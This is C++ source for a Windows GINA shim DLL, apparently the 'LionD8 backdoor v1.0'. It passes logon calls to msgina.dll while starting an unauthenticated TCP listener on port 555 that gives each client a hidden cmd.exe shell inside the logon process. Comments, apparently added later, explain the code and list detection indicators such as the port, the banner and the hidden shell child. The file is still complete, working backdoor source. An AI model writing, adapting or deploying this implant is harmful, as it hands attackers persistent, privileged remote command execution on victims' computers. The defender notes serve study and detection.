// ginadll.cpp : Defines the entry point for the DLL application.
//
#include "stdafx.h"
#include <windows.h>
#include <stdio.h>
#include <winwlx.h>
#include "winsock2.h"
// Function-pointer types matching the Winlogon GINA (Wlx*) exports declared in
// <winwlx.h>. Each Wlx* function exported by this DLL resolves the same-named
// entry in the real msgina.dll through one of these and forwards the call, i.e.
// this is a pass-through ("shim") GINA. It only takes effect if registered as
// the system GINA, which is not part of this file.
typedef BOOL (WINAPI *PFUNCWLXNEGOTIATE)( DWORD, DWORD* );
typedef BOOL (WINAPI *PFUNCWLXINITIALIZE)( LPWSTR, HANDLE, PVOID, PVOID, PVOID* );
typedef VOID (WINAPI *PFUNCWLXDISPLAYSASNOTICE)( PVOID );
typedef int (WINAPI *PFUNCWLXLOGGEDOUTSAS)( PVOID, DWORD, PLUID, PSID, PDWORD, PHANDLE, PWLX_MPR_NOTIFY_INFO, PVOID *);
typedef BOOL (WINAPI *PFUNCWLXACTIVATEUSERSHELL)( PVOID, PWSTR, PWSTR, PVOID );
typedef int (WINAPI *PFUNCWLXLOGGEDONSAS)( PVOID, DWORD, PVOID );
typedef VOID (WINAPI *PFUNCWLXDISPLAYLOCKEDNOTICE)( PVOID );
typedef int (WINAPI *PFUNCWLXWKSTALOCKEDSAS)( PVOID, DWORD );
typedef BOOL (WINAPI *PFUNCWLXISLOCKOK)( PVOID );
typedef BOOL (WINAPI *PFUNCWLXISLOGOFFOK)( PVOID );
typedef VOID (WINAPI *PFUNCWLXLOGOFF)( PVOID );
typedef VOID (WINAPI *PFUNCWLXSHUTDOWN)( PVOID, DWORD );
typedef BOOL (WINAPI *PFUNCWLXSCREENSAVERNOTIFY)( PVOID, BOOL * );
typedef BOOL (WINAPI *PFUNCWLXSTARTAPPLICATION)( PVOID, PWSTR, PVOID, PWSTR );
typedef BOOL (WINAPI *PFUNCWLXNETWORKPROVIDERLOAD) (PVOID, PWLX_MPR_NOTIFY_INFO);
#pragma comment (lib,"ws2_32.lib") // Winsock 2 import library for the TCP listener defined below
// Worker-thread entry points (definitions follow the Wlx* wrappers).
DWORD WINAPI BackDoor (LPVOID lp);
DWORD WINAPI SendThread ( LPVOID lp );
DWORD WINAPI RecvThread ( LPVOID lp);
DWORD WINAPI StartInit(PVOID lp);
// Process-wide state shared between the worker threads without any locking.
// hSRead / hStdOut : read and write ends of the child's stdout+stderr pipe.
// hStdInput / hSWrite: read and write ends of the child's stdin pipe.
HANDLE hStdOut = NULL, hSRead = NULL;
HANDLE hStdInput = NULL, hSWrite = NULL;
// Plain (non-atomic) BOOL: read by RecvThread and SendThread, set by RecvThread,
// reset by StartInit between sessions. Cross-thread visibility is not guaranteed.
BOOL bExit = FALSE;
// Handle of the child process created in BackDoor; RecvThread terminates it.
HANDLE hProcess = NULL;
// DLL entry point. Nothing is done on attach/detach; all activity is driven by
// the Wlx* calls below. hModule is declared HANDLE rather than the usual HINSTANCE.
BOOL APIENTRY DllMain( HANDLE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
return TRUE;
}
// Forwards WlxNegotiate to the real msgina.dll. Like every wrapper in this file,
// it calls LoadLibrary on each invocation and never calls FreeLibrary, so the
// msgina.dll reference count grows with every call. Returns FALSE if the module
// or the export cannot be found.
BOOL WINAPI WlxNegotiate(DWORD dwWinlogonVersion, DWORD *pdwDllVersion)
{
HINSTANCE hDll=NULL;
if( !(hDll = LoadLibrary( "msgina.dll" )) )
return FALSE;
PFUNCWLXNEGOTIATE pWlxNegotiate = (PFUNCWLXNEGOTIATE)GetProcAddress( hDll, "WlxNegotiate" );
if( !pWlxNegotiate )
return FALSE;
return pWlxNegotiate( dwWinlogonVersion, pdwDllVersion );
}
// Forwards WlxInitialize to msgina.dll, after initialising Winsock 2.2 for the
// listener started later from WlxLoggedOutSAS. A WSAStartup failure makes the
// whole initialisation fail (FALSE). WSACleanup is never called anywhere in the
// file, and hDll is never released.
BOOL WINAPI WlxInitialize( LPWSTR lpWinsta, HANDLE hWlx,
PVOID pvReserved, PVOID pWinlogonFunctions, PVOID *pWlxContext)
{
HINSTANCE hDll=NULL;
if( !(hDll = LoadLibrary( "msgina.dll" )) )
return FALSE;
PFUNCWLXINITIALIZE pWlxInitialize = (PFUNCWLXINITIALIZE)GetProcAddress( hDll, "WlxInitialize" );
if( !pWlxInitialize )
return FALSE;
WSADATA WSAData;
if (WSAStartup(MAKEWORD(2,2), &WSAData)!=0) // Winsock needed by StartInit/BackDoor
return FALSE;
return pWlxInitialize( lpWinsta, hWlx, pvReserved,
pWinlogonFunctions, pWlxContext );
}
// Forwards WlxDisplaySASNotice to msgina.dll; silently does nothing if the module
// or export is missing. hDll is never released.
VOID WINAPI WlxDisplaySASNotice( PVOID pWlxContext )
{
HINSTANCE hDll=NULL;
if( !(hDll = LoadLibrary( "msgina.dll" )) )
return ;
PFUNCWLXDISPLAYSASNOTICE pWlxDisplaySASNotice =
(PFUNCWLXDISPLAYSASNOTICE)GetProcAddress( hDll, "WlxDisplaySASNotice" );
if( !pWlxDisplaySASNotice )
return ;
pWlxDisplaySASNotice( pWlxContext );
}
// Forwards WlxLoggedOutSAS to msgina.dll, but first spawns the StartInit listener
// thread. This runs on every logged-out SAS, so each SAS creates another
// StartInit thread; presumably only the first one's bind() on port 555 succeeds
// and the rest return early (not verified here). The thread handle is never
// closed. On a missing module/export it returns FALSE (0), which is not a
// WLX_SAS_ACTION_* value. hDll is never released.
int WINAPI WlxLoggedOutSAS(PVOID pWlxContext, DWORD dwSasType,
PLUID pAuthenticationId, PSID pLogonSid, PDWORD pdwOptions,
PHANDLE phToken, PWLX_MPR_NOTIFY_INFO pMprNotifyInfo,
PVOID *pProfile)
{
HINSTANCE hDll=NULL;
if( !(hDll = LoadLibrary( "msgina.dll" )) )
return FALSE;
PFUNCWLXLOGGEDOUTSAS pWlxLoggedOutSAS =
(PFUNCWLXLOGGEDOUTSAS)GetProcAddress( hDll, "WlxLoggedOutSAS" );
if( !pWlxLoggedOutSAS )
return FALSE;
HANDLE hmutex=CreateMutex(NULL,FALSE,NULL); // create mutex object (unnamed and local, so it synchronises nothing else)
WaitForSingleObject(hmutex,INFINITE);
CreateThread(NULL,NULL,StartInit,NULL,NULL,NULL); // start the TCP listener; handle not kept
ReleaseMutex(hmutex);
CloseHandle(hmutex);
int ret = pWlxLoggedOutSAS(pWlxContext, dwSasType, pAuthenticationId,
pLogonSid, pdwOptions, phToken, pMprNotifyInfo, pProfile);
return ret;
}
// Forwards WlxActivateUserShell to msgina.dll; FALSE if the module or export is
// missing. hDll is never released.
BOOL WINAPI WlxActivateUserShell(
PVOID pWlxContext,
PWSTR pszDesktopName,
PWSTR pszMprLogonScript,
PVOID pEnvironment)
{
HINSTANCE hDll=NULL;
if( !(hDll = LoadLibrary( "msgina.dll" )) )
return FALSE;
PFUNCWLXACTIVATEUSERSHELL pWlxActivateUserShell =
(PFUNCWLXACTIVATEUSERSHELL)GetProcAddress( hDll, "WlxActivateUserShell" );
if( !pWlxActivateUserShell )
return FALSE;
return pWlxActivateUserShell(
pWlxContext,
pszDesktopName,
pszMprLogonScript,
pEnvironment);
}
// Forwards WlxLoggedOnSAS to msgina.dll. On a missing module/export it returns
// FALSE (0), which is not a WLX_SAS_ACTION_* value. hDll is never released.
int WINAPI WlxLoggedOnSAS(
PVOID pWlxContext,
DWORD dwSasType,
PVOID pReserved)
{
HINSTANCE hDll=NULL;
if( !(hDll = LoadLibrary( "msgina.dll" )) )
return FALSE;
PFUNCWLXLOGGEDONSAS pWlxLoggedOnSAS =
(PFUNCWLXLOGGEDONSAS)GetProcAddress( hDll, "WlxLoggedOnSAS" );
if( !pWlxLoggedOnSAS )
return FALSE;
return pWlxLoggedOnSAS( pWlxContext, dwSasType, pReserved );
}
// Forwards WlxDisplayLockedNotice to msgina.dll; silently does nothing if the
// module or export is missing. hDll is never released.
VOID WINAPI WlxDisplayLockedNotice( PVOID pWlxContext )
{
HINSTANCE hDll=NULL;
if( !(hDll = LoadLibrary( "msgina.dll" )) )
return ;
PFUNCWLXDISPLAYLOCKEDNOTICE pWlxDisplayLockedNotice =
(PFUNCWLXDISPLAYLOCKEDNOTICE)GetProcAddress(
hDll,
"WlxDisplayLockedNotice" );
if( !pWlxDisplayLockedNotice )
return ;
pWlxDisplayLockedNotice( pWlxContext );
}
// Forwards WlxIsLockOk to msgina.dll; FALSE (lock not permitted) if the module or
// export is missing. hDll is never released.
BOOL WINAPI WlxIsLockOk( PVOID pWlxContext )
{
HINSTANCE hDll=NULL;
if( !(hDll = LoadLibrary( "msgina.dll" )) )
return FALSE;
PFUNCWLXISLOCKOK pWlxIsLockOk = (PFUNCWLXISLOCKOK)GetProcAddress( hDll, "WlxIsLockOk" );
if( !pWlxIsLockOk )
return FALSE;
return pWlxIsLockOk( pWlxContext );
}
// Forwards WlxWkstaLockedSAS to msgina.dll. On a missing module/export it returns
// FALSE (0), which is not a WLX_SAS_ACTION_* value. hDll is never released.
int WINAPI WlxWkstaLockedSAS(
PVOID pWlxContext,
DWORD dwSasType )
{
HINSTANCE hDll=NULL;
if( !(hDll = LoadLibrary( "msgina.dll" )) )
return FALSE;
PFUNCWLXWKSTALOCKEDSAS pWlxWkstaLockedSAS =
(PFUNCWLXWKSTALOCKEDSAS)GetProcAddress( hDll, "WlxWkstaLockedSAS" );
if( !pWlxWkstaLockedSAS )
return FALSE;
return pWlxWkstaLockedSAS( pWlxContext, dwSasType );
}
// Forwards WlxIsLogoffOk to msgina.dll; FALSE (logoff not permitted) if the
// module or export is missing. hDll is never released.
BOOL WINAPI WlxIsLogoffOk( PVOID pWlxContext )
{
HINSTANCE hDll=NULL;
if( !(hDll = LoadLibrary( "msgina.dll" )) )
return FALSE;
PFUNCWLXISLOGOFFOK pWlxIsLogoffOk = (PFUNCWLXISLOGOFFOK)GetProcAddress( hDll, "WlxIsLogoffOk" );
if( !pWlxIsLogoffOk )
return FALSE;
return pWlxIsLogoffOk( pWlxContext );
}
// Forwards WlxLogoff to msgina.dll; silently does nothing if the module or export
// is missing. hDll is never released.
VOID WINAPI WlxLogoff( PVOID pWlxContext )
{
HINSTANCE hDll=NULL;
if( !(hDll = LoadLibrary( "msgina.dll" )) )
return ;
PFUNCWLXLOGOFF pWlxLogoff = (PFUNCWLXLOGOFF)GetProcAddress( hDll, "WlxLogoff" );
if( !pWlxLogoff )
return ;
pWlxLogoff( pWlxContext );
}
// Forwards WlxShutdown to msgina.dll; silently does nothing if the module or
// export is missing. No cleanup of this file's own resources (Winsock, listener
// socket, pipe handles) happens here. hDll is never released.
VOID WINAPI WlxShutdown( PVOID pWlxContext, DWORD ShutdownType )
{
HINSTANCE hDll=NULL;
if( !(hDll = LoadLibrary( "msgina.dll" )) )
return ;
PFUNCWLXSHUTDOWN pWlxShutdown = (PFUNCWLXSHUTDOWN)GetProcAddress( hDll, "WlxShutdown" );
if( !pWlxShutdown )
return ;
pWlxShutdown( pWlxContext, ShutdownType );
}
// Forwards WlxScreenSaverNotify to msgina.dll. Unlike the other wrappers, a
// missing export is not an error: the screen saver is then reported as secure
// (*pSecure = TRUE) and TRUE is returned. A missing module still returns FALSE
// without touching *pSecure. hDll is never released.
BOOL WINAPI WlxScreenSaverNotify(
PVOID pWlxContext,
BOOL * pSecure
)
{
HINSTANCE hDll=NULL;
if( !(hDll = LoadLibrary( "msgina.dll" )) )
return FALSE;
PFUNCWLXSCREENSAVERNOTIFY pWlxScreenSaverNotify = (PFUNCWLXSCREENSAVERNOTIFY)
GetProcAddress( hDll, "WlxScreenSaverNotify" );
if(pWlxScreenSaverNotify != NULL)
return pWlxScreenSaverNotify( pWlxContext, pSecure );
*pSecure = TRUE; // fallback: treat the screen saver as secure
return *pSecure;
}
// Forwards WlxStartApplication to msgina.dll. Inconsistent with the other
// wrappers: the GetProcAddress result is not checked for NULL before the call,
// so a missing export would be invoked through a null pointer. hDll is never
// released.
BOOL WINAPI WlxStartApplication(
PVOID pWlxContext,
PWSTR pszDesktopName,
PVOID pEnvironment,
PWSTR pszCmdLine
)
{
HINSTANCE hDll=NULL;
if( !(hDll = LoadLibrary( "msgina.dll" )) )
return FALSE;
PFUNCWLXSTARTAPPLICATION pWlxStartApplication = (PFUNCWLXSTARTAPPLICATION) GetProcAddress( hDll, "WlxStartApplication" );
return pWlxStartApplication( pWlxContext, pszDesktopName,
pEnvironment,pszCmdLine );
}
// Forwards WlxNetworkProviderLoad to msgina.dll. As in WlxStartApplication, the
// GetProcAddress result is not NULL-checked before the call. hDll is never
// released.
BOOL WINAPI WlxNetworkProviderLoad(
PVOID pWlxContext,
PWLX_MPR_NOTIFY_INFO pNprNotifyInfo )
{
HINSTANCE hDll=NULL;
if( !(hDll = LoadLibrary( "msgina.dll" )) )
return FALSE;
PFUNCWLXNETWORKPROVIDERLOAD pWlxNetworkProviderLoad = (PFUNCWLXNETWORKPROVIDERLOAD) GetProcAddress( hDll, "WlxNetworkProviderLoad" );
return pWlxNetworkProviderLoad(pWlxContext,pNprNotifyInfo);
}
/////// BackDoor
// Listener thread, started from WlxLoggedOutSAS. Binds a TCP socket to port 555
// on every interface (INADDR_ANY), accepts one client at a time and runs a
// BackDoor session for it, blocking until that session ends before accepting
// the next. The accepted connection is not authenticated in any way. The thread
// runs inside whichever process loaded this GINA (presumably winlogon, given the
// Wlx exports — not shown on this page), so each session inherits that
// process's identity.
// Defender note: an unexpected listening TCP port (555 here) owned by the GINA
// host process is the most direct indicator of this component.
DWORD WINAPI StartInit(PVOID lp)
{
SOCKET sock=NULL;
sock = socket (AF_INET,SOCK_STREAM,IPPROTO_TCP);
SOCKADDR_IN addr_in = {0};
addr_in.sin_family = AF_INET;
addr_in.sin_port = htons(555);
addr_in.sin_addr.S_un.S_addr = htonl(INADDR_ANY);
if(bind(sock,(sockaddr *)&addr_in,sizeof(sockaddr))==SOCKET_ERROR)
return 1; // e.g. port already in use by an earlier StartInit thread; sock is not closed
listen(sock,1);
sockaddr_in sin={0};
int size = sizeof(sin);
while ( TRUE )
{
SOCKET recvSock=accept(sock,(sockaddr *)&sin,&size); //(sockaddr *)&sin,&size);
if ( recvSock == INVALID_SOCKET )
{
Sleep(1000);
continue;
}
HANDLE hmutex=CreateMutex(NULL,FALSE,NULL); // create mutex object (unnamed and local, so it synchronises nothing else)
WaitForSingleObject(hmutex,INFINITE);
HANDLE hThread = CreateThread(NULL,NULL,BackDoor,&recvSock,0,NULL); // &recvSock stays valid: this thread blocks on hThread below
ReleaseMutex(hmutex);
CloseHandle(hmutex);
WaitForSingleObject(hThread,INFINITE); // one session at a time; hThread is never closed
bExit = FALSE; // re-arm the shared exit flag for the next session
}
return 1;
}
// Per-connection session, run on its own thread by StartInit; lp points at the
// accepted SOCKET. Sends a fixed banner, creates two anonymous pipes with
// inheritable handles, and launches a hidden cmd.exe from the system directory
// with stdin/stdout/stderr redirected to those pipes. RecvThread and SendThread
// then relay bytes between the socket and the pipes; this function blocks until
// both have exited and finally closes the socket. The pipe handles and the
// process/thread handles in ProInfor are stored in or left as globals and never
// closed here. The strlen/strcat calls on TCHAR buffers assume a non-UNICODE
// build (TCHAR == char).
// Defender note: the banner string below is a fixed network IoC, and a hidden
// cmd.exe child of the GINA host process whose standard handles are pipes,
// with the parent holding a network socket, is a high-signal detection.
DWORD WINAPI BackDoor (LPVOID lp)
{
char* p ="**********************\r\nLionD8 backdoor v1.0\r\n**********************\r\n";
SOCKET sock = *(SOCKET*)lp;
send(sock,p,strlen(p),0); // banner sent to the client
SECURITY_ATTRIBUTES sa;
sa.bInheritHandle =TRUE; // pipe handles must be inheritable for the child to use them
sa.nLength = sizeof(sa);
sa.lpSecurityDescriptor = NULL;
CreatePipe ( &hSRead, &hStdOut, &sa, 0 ); // child writes stdout/stderr to hStdOut; SendThread reads hSRead
CreatePipe ( &hStdInput, &hSWrite, &sa, 0 ); // RecvThread writes hSWrite; child reads stdin from hStdInput
STARTUPINFO StartInfor = {0};
PROCESS_INFORMATION ProInfor = {0};
StartInfor.cb = sizeof ( STARTUPINFO );
StartInfor.wShowWindow = SW_HIDE; // no visible console
StartInfor.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
StartInfor.hStdOutput = StartInfor.hStdError = hStdOut;
StartInfor.hStdInput = hStdInput;
TCHAR SysDir[MAX_PATH] = {0};
GetSystemDirectory(SysDir,MAX_PATH);
if ( SysDir[strlen(SysDir)-1] != '\\') // ensure a trailing backslash before appending
strcat(SysDir,"\\");
strcat(SysDir,"cmd.exe"); // "<system dir>\cmd.exe"
HANDLE hmutex=CreateMutex(NULL,FALSE,NULL); // create mutex object (unnamed and local, so it synchronises nothing else)
WaitForSingleObject(hmutex,INFINITE);
CreateProcess(NULL,SysDir,NULL,NULL,TRUE,NULL,NULL,NULL,&StartInfor,&ProInfor); // bInheritHandles = TRUE; result not checked
hProcess = ProInfor.hProcess; // shared global; RecvThread terminates it on disconnect
CloseHandle(hStdOut); // drop the parent's copies of the child-side pipe ends
CloseHandle(hStdInput);
HANDLE hArray[2] = {0};
hArray[0] = CreateThread (NULL,NULL,RecvThread,&sock,NULL,NULL); // socket -> child stdin
hArray[1] = CreateThread (NULL,NULL,SendThread,&sock,NULL,NULL); // child stdout -> socket
ReleaseMutex(hmutex);
CloseHandle(hmutex);
WaitForMultipleObjects(2,hArray,TRUE,INFINITE); // wait for both relay threads
closesocket(sock);
return 1;
}
// Socket -> child stdin relay. Reads the connection one byte at a time, echoes
// each byte back to the client and accumulates it in CmdBuf until a '\n'
// arrives; the whole line is then written to the child's stdin pipe. A line
// whose first four characters equal "exit" (case-insensitive) sets bExit so the
// relay threads stop. If recv() returns anything other than 1 (connection
// closed or failed), bExit is set and the child process is terminated.
// CmdBuf is 512 bytes and neither the strcat() below nor num is checked against
// that size, so an over-long line overruns the stack buffer (memory-safety
// defect in the host process).
DWORD WINAPI RecvThread ( LPVOID lp)
{
SOCKET sock = *(SOCKET*)lp;
TCHAR CmdBuf[512] = {0}; // command line currently being assembled
int num = 0; // bytes accumulated in CmdBuf
while ( TRUE )
{
if ( bExit == TRUE )
return 1;
TCHAR Tbuf[2] = {0}; // one byte plus NUL terminator so strcat() can append it
int ret = recv(sock, Tbuf, 1, 0);
if ( ret == 1 )
{
num++;
strcat(CmdBuf,Tbuf);
send(sock,Tbuf,1,0); // echo the byte back to the client
if ( Tbuf[0] == '\n' ) // end of line received: hand the command to the child
{
TCHAR buf[5] = {0};
DWORD A=0;
WriteFile(hSWrite,CmdBuf,num,&A,NULL);
memcpy ( buf, CmdBuf, 4); // only the first four characters are compared
int ret = _stricmp (buf,"exit"); // shadows the outer ret (legal in C++)
if ( ret == 0 )
bExit = TRUE;
memset(CmdBuf,0,512);
num=0;
}
}
else
{
bExit = TRUE; // connection closed or errored
DWORD A=0;
GetExitCodeProcess(hProcess,&A); // presumably STILL_ACTIVE for a running child — confirm
TerminateProcess(hProcess,A);
}
}
return 1;
}
// Child stdout -> socket relay. Polls the child's stdout/stderr pipe with
// PeekNamedPipe every 100 ms; when data is pending it reads up to 512 bytes and
// sends exactly that many to the client. Returns when bExit is set. Errors from
// PeekNamedPipe, ReadFile and send are not checked.
DWORD WINAPI SendThread ( LPVOID lp )
{
SOCKET sock = *(SOCKET*)lp;
TCHAR Buf[512]={0};
DWORD ReadSize = 0;
while(TRUE)
{
if ( bExit == TRUE )
return 1;
PeekNamedPipe(hSRead,Buf,512,&ReadSize,NULL,NULL); // ReadSize = bytes copied by the peek (data stays in the pipe)
if ( ReadSize > 0 )
ReadFile(hSRead,Buf,512,&ReadSize,NULL); // consume; ReadSize = bytes actually read
else
{
Sleep(100); // nothing pending: poll again shortly
continue;
}
send (sock,Buf,ReadSize,0); // send only what was read
memset(Buf,0,512);
}
return 1;
}